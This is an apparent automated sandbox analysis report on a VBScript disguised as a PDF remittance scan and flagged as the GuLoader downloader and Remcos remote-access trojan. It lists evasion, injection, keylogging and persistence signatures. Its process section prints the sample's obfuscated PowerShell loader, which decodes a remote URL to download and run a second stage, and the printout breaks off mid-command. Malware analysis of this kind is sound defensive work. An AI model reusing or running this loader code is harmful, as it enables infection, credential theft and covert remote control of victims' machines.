Windows
Analysis Report
REMIT_SCAN_00008917738378282733(PDF).vbs
Overview
General Information
Detection
GuLoader, Remcos
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Queries memory information (via WMI often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64native
wscript.exe (PID: 844 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\REMIT _SCAN_0000 8917738378 282733(PDF ).vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1) powershell.exe (PID: 6212 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "echo $Hle s;function Strejflys et($Chefko kkes){ .($ Postlachry mal) ($Che fkokkes)} function K rigskunst( $Diplomata riers){$Oc cipitally= 5;do{$unde finably+=$ Diplomatar iers[$Occi pitally];F ormat-List ;$Occipita lly+=6} un til(!$Dipl omatariers [$Occipita lly])$unde finably}$L ovgennemga ngene=Krig skunst 'Ud skrnHorrie GlyphTBagd i. atoW';$ Lovgennemg angene+=Kr igskunst ' Lame ECzbi aB SrloCLa rvelArthrI NuthaeCha tN Grant'; $outyelps= Krigskunst ' R stMEv oluoRed lz Af.riiPels kl,kupulhu ngaaKobra/ ';$Affirma tionerne=K rigskunst 'LrerfTDed oll Intess tte1Valut 2';$Overkr slerne='In den[HesitN ,ainteJohn sTUnwea.Ov ergsFoursE Kval,Racet yVRacefIHa ndlcAyensE Moun PSaro no sseI lo mn BlomTCa tacmNonofA simreNBygn iACoqueG K va,eKrat R Karse]Derm i:p.rvi:De linSVeinae uthycOmph auLabo RCh oktI reent Gasbey eve pStatirInf rodetaltc ane oDyn e cEgadsO U emlKelso=S t,rt$ rafl aDeflofSom tfUnth I PhilrPrepg mBes.na.il but Sttyi Spr,oFusio nB vareRet hrRLabdan autoe';$ou tyelps+=Kr igskunst ' Sn.er5Klod s.Ps mm0Hy pok Presi( FohatWAkku siSeksunAe o idRefleo SheatwProc esSidst st ikdNHandgT Antim mbel 1Koll 0Hjt ta. Opna0B ar u;Tr,ch A ndWNoto uiCistsnRh omb6 Afsv4 Damp,; ele p snd gxCo mpe6 ircu4 nedsl; Ref o temnrMer rivT bul:s palt1 Bese 3 Fors4Ant i .Jo,fr0. ioly)Navle MariGLant heGapescPo pulk Grano Sla t/teks t2Whitt0K udd1Excur0 ,nfar0 ims f1Sklde0Co nvo1Rollm S rvFBibel iTh.rar Ci teRetiaf Halco Z pp xth,ee/Inf la1 ryns3A cros4Trium .Forsg0';$ dermutatio n=Krigskun st ' DecaU jordsSA pl iEExstirRh ino-.arboa TaeniGBeh, nEEskatnBy gget';$Tre djeinstans bevillings =Krigskuns t 'Fi kehH rcutSkude tSpitep Et ro:Untea/e ndod/s alo sOvermbPol yat hysieG enbrcS,amk hAssocu il bsS uff.Un lugc .orto Meu rm Gen i/Flu tz.e rviiantapg AnticiTyra n/Sulf,H A nthe .ypen BonifgEv n giestisvTi shre Bundl ImmunsNapp ee Trafn S iss Krnk. RetfcGenl yhhumanm'; $Textus=Kr igskunst ' Am hi>';$P ostlachrym al=Krigsku nst 'B.der iF erdE Hy drX';$Occi pitallynco rruptibly= 'Unlax';$E mmensite=' \Leverings tiden.Req' ;Strejflys et (Krigsk unst 'Jani c$ AndeGTe rpilSkyldO Mal.bli.a baUnwinl w eig:ForvuV KokosAWill iNLeje D P artO Udbym asypRWed eAMar aaDi iodd,ookee Grund= Bea d$Pa kwe D rivnCoracv Trick:Bobl eaT wlipSu btrplen pd Hydr ABu.b itPinnuaB. dmt+Ene g$ FolkeEkake rMNonosMOs traEM orhN AverSSyst ei accuTAf kryE');Str ejflyset ( Krigskunst 'Xyli,$ D iphGgif.eL Bortfo.ott iBenglaAOv nenlWhi k: ,mrevLn,i naIldhun L oneD MariD Bal,sYphil obCrackDRe nteEMomman DecodSvarm e=Lumin$Qu izzttilslr Ni htEKes. rd r faj H aanE M soI hektonResh osDisowTEc cenaT,lemN ZymicSFlee cBArt se , pprV For I